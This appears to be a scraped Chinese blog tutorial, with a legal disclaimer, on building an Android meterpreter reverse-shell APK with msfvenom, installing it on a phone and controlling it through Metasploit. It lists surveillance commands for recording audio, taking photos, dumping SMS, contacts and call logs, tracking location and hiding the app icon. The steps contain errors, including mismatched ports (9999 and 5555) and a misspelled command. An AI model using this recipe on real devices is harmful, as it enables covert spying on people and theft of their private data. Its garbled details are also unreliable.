|>>>中华人民共和国网络安全法<<<|警告:请勿用于非法用途,后果自负!

0.环境

  • 虚拟机 KaliLinux
  • 手机 Redmi 6A
  • 同一局域网下

1.查看控制端IP

ifconfig

即192.168.xx.xxx

2.生成木马程序

>>>msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.xx.xxx lport=9999 R>/home/hugboy/桌面/Share/hugboyMsf.apk

-设置监听端主机lhost=192.168.xx.xxx

-设置监听端主机端口lhost=5555

-保存到指定目录R>/home/hugboy/桌面/hugboyMsf.apk



自动生成了一个10179 bytes 大小的程序

3.把hugboyMsf.apk安装到目标手机并运行

1).如何让虚拟机与主机数据分享,进而发送到手机上安装?

安装VMtools直接拖到本地桌面

Apt update

Apt install open-vm-tools-desktop fuse

Reboot

重启生效

2).发送到手机安装,忽略警告,点击继续。。。

4.打开metasploit工具



5.设置payload

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 192.168.xx.xxx

set LPORT 5555


exploit

6.显示meterpreter>说明连接成功

常用命令

+麦克风

-record_mic 从麦克风huhugb录制音频X秒

-h 帮助

-d 记录秒数

-F 音频保存路径,默认 HOME/xxxx.wav

-p 自动播放捕获的音频

+webcam_list 列出手机摄像头个数

+webcam_snap 从指定摄像头拍摄照片

-h 帮助

-I 选择要使用的摄像头

-p 图片路径,默认HOME/xxxx.jpeg

-q 图片质量,默认为50

-v 自动查看图片

+webcam_chat 开始视频聊天

+webcam_stream 从摄像拍摄视频

演示

列出设备的摄像头

webcma_list

选择第一个摄像头(后置摄像头)拍照

webcam_snap -i 1

全部命令

help

Stdapi: File system Commands

Command       Description

-------       -----------

cat           Read the contents of a file to the screen

cd            Change directory

checksum      Retrieve the checksum of a file

cp            Copy source to destination

dir           List files (alias for ls)

download      Download a file or directory

edit          Edit a file

getlwd        Print local working directory

getwd         Print working directory

lcd           Change local working directory

lls           List local files

lpwd          Print local working directory

ls            List files

mkdir         Make directory

mv            Move source to destination

pwd           Print working directory

rm            Delete the specified file

rmdir         Remove directory

search        Search for files

upload        Upload a file or directory

Stdapi: Networking Commands

Command       Description

-------       -----------

ifconfig      Display interfaces

ipconfig      Display interfaces

portfwd       Forward a local port to a remote service

route         View and modify the routing table

Stdapi: System Commands

Command       Description

-------       -----------

execute       Execute a command

getuid        Get the user that the server is running as

localtime     Displays the target system's local date and time

pgrep         Filter processes by name

ps            List running processes

shell         Drop into a system command shell

sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

Command       Description

-------       -----------

screenshare   Watch the remote user's desktop in real time

screenshot    Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands

Command        Description

-------        -----------

record_mic     Record audio from the default microphone for X seconds

webcam_chat    Start a video chat

webcam_list    List webcams

webcam_snap    Take a snapshot from the specified webcam

webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands

Command       Description

-------       -----------

play          play a waveform audio file (.wav) on the target system

Android Commands

Command           Description

-------           -----------

activity_start    Start an Android activity from a Uri string

check_root        Check if device is rooted

dump_calllog      Get call log

dump_contacts     Get contacts list

dump_sms          Get sms messages

geolocate         Get current lat-long using geolocation

hide_app_icon     Hide the app icon from the launcher

interval_collect  Manage interval collection capabilities

send_sms          Sends SMS from target session

set_audio_mode    Set Ringer Mode

sqlite_query      Query a SQLite database from storage

wakelock          Enable/Disable Wakelock

wlan_geolocate    Get current lat-long using WLAN information

Application Controller Commands

Command        Description

-------        -----------

app_install    Request to install apk file

app_list       List installed apps in the device

app_run        Start Main Activty for package name

app_uninstall  Request to uninstall application

Msf--控制 Android手机的更多相关文章

  1. PC端轻松控制Android手机,PC Control Andoroid,PC控制安卓手机

    记录此次经历的目的是帮助需要的人或下次使用时少走弯路,我为此试用了不少工具及方法,因为追求免费,像"Weak Control:在PC上控制你的Android手机"还要收费的我就不弄 ...

  2. 苹果如何控制android手机,安卓手机怎么控制苹果?

    小编经常通过手机远程控制别人手机,帮助他人解决一些电脑问题,另外还经常需要通过远程电脑控制服务器,管理脚本之家的服务器等等,可能这些对大家都没有什么诱惑,今天笔者为大家带来一个非常有趣的手机控制电脑的 ...

  3. Scrcpy用电脑控制Android手机(支持Windows/macOS/Linux)

    一.scrcpy简介 注意:拼写是scrcpy,非Python爬虫框架Scrapy. scrcpy可以通过adb调试的方式来将手机屏幕投到电脑上,并可以通过电脑控制您的Android设备.它可以通过U ...

  4. 单片机与android手机通信(控制LED小灯亮灭)

    1.单片机实验板功能设计 为验证数据通信内容,让单片机板上的四个按键与android手机客户端上的四个LED灯相互控制:为达到上述基本实验要求,采用单字符传输数据即可,硬件需设计两块相同的单片机电路板 ...

  5. 用鼠标键盘来控制你的Android手机——同屏显示简单教程

    今天在微博上看到有人用电脑鼠标操作iPhone手机玩打飞机游戏,非常炫,虽然自己用的不是iPhone,但相信Android手机肯定也能实现这样的功能,于是网上各种搜索方法,终于看到了一篇试用成功的帖子 ...

  6. 我的Android进阶之旅------>Android实现用Android手机控制PC端的关机和重启的功能(三)Android客户端功能实现

    我的Android进阶之旅------>Android实现用Android手机控制PC端的关机和重启的功能(一)PC服务器端(地址:http://blog.csdn.net/ouyang_pen ...

  7. 电脑控制Android设备的软件——Total Control

    最早开始搞Android开发时,为了调试方便,想找一个Android下的远程控制软件,支持在电脑端远程控制和同步显示Android设备.先后试了360手机助手.Mobizen.Vysor和Mirror ...

  8. Pyqt adb 获取Android手机屏幕

    adb的全称为Android Debug Bridge,就是起到调试桥的作用.adb的工作方式比较特殊,采用监听Socket TCP 5554等端口的方式让IDE和Qemu通讯,默认情况下adb会da ...

  9. GPS部标平台的架构设计(六)-Android手机客户端和手机查车设计

    对于GPS软件平台,虽然有功能非常丰富的PC端或BS客户端,但是客户也是需要移动客户端来作为自己的辅助工具,也是需要的.做为GPS平台的设计者和开发者,在开发移动客户端的时候,也需要从常规的服务器开发 ...

  10. 为什么iphone手机比android手机流畅

    作为当下最流行.市场占用份额最大的两大手机操作系统IOS和android,目前两者加起来的市场占用率达到90%.我曾经一直用android手机,没有用过iphone,那时候正直iphone4和ipho ...

随机推荐

  1. 第11 章 : 可观测性:你的应用健康吗?(liveness和readiness)

    课时 11:可观测性:你的应用健康吗?(莫源) 本次课程的分享主要围绕以下五个部分: 介绍一些整体需求的来源: 介绍在 K8s 中 Liveness 和 Readiness 的使用方式: 介绍在 K8 ...

  2. [DP]城市交通

    城市交通 Time Limit:1000MS--Memory Limit:65536K 题目描述 有n个城市,编号1~n,有些城市之间有路相连,有些则没有,有路则当然有一个距离.现在规定只能从编号小的 ...

  3. 研发效率破局之道 Facebook工作法

    如果你问中国和美国互联网公司都有什么差别,很多人会回答:低效加班文化.最近爆出的996大讨论,通过糙快猛打拼和996加班去抢占市场获得机会的成功案例越来越少.至此,只有提高效能才是出路. 由于软件开发 ...

  4. Ray Tracing in one Weekend 阅读笔记

    目录 一.创建Ray类,实现背景 二.加入一个球 三.让球的颜色和其法线信息相关 四.多种形状,多个碰撞体 五.封装相机类 六.抗锯齿 七.漫发射 八.抽象出材料类(编写metal类) 九.介质材料( ...

  5. SpringBoot-容器启动的时候执行一些内容

    SpringBoot的ApplicationRunner.CommandLineRunner 场景: 在开发中可能会有这样的情景.需要在容器启动的时候执行一些内容.比如读取配置文件,数据库连接之类的. ...

  6. 观世音甘泉活树的故事竟然是Java设计模式:备忘录模式

    目录 定义 意图 主要解决问题 何时使用 优缺点 结构 白箱实现 黑箱实现 多重检查点 观世音甘泉活树的故事 定义 备忘录模式是对象的行为型模式,备忘录对象是一个用来存储另外一个对象内部状态的快照的对 ...

  7. Jmeter对数据库批量增删改查

    本文主要的内容是使用Jmeter对数据库进行数据的操作,包括单条语句的增删改查,多条语句的增删改查,本文主要介绍操作流程,关于流程的运作原理,对原理感兴趣的同学可自行查阅资料. 首先需要准备一个数据库 ...

  8. Foreign Exchange UVA - 10763

      Your non-profit organization (iCORE - international Confederation of Revolver Enthusiasts) coordin ...

  9. 深度解析Django REST Framework 批量操作

    我们都知道Django rest framework这个库,默认只支持批量查看,不支持批量更新(局部或整体)和批量删除. 下面我们来讨论这个问题,看看如何实现批量更新和删除操作. DRF基本情况 我们 ...

  10. 一个DDOS病毒的分析(二)

    一.基本信息 样本名称:hra33.dll或者lpk.dll 样本大小: 66560 字节 文件类型:Win32的dll文件 病毒名称:Dropped:Generic.ServStart.A3D47B ...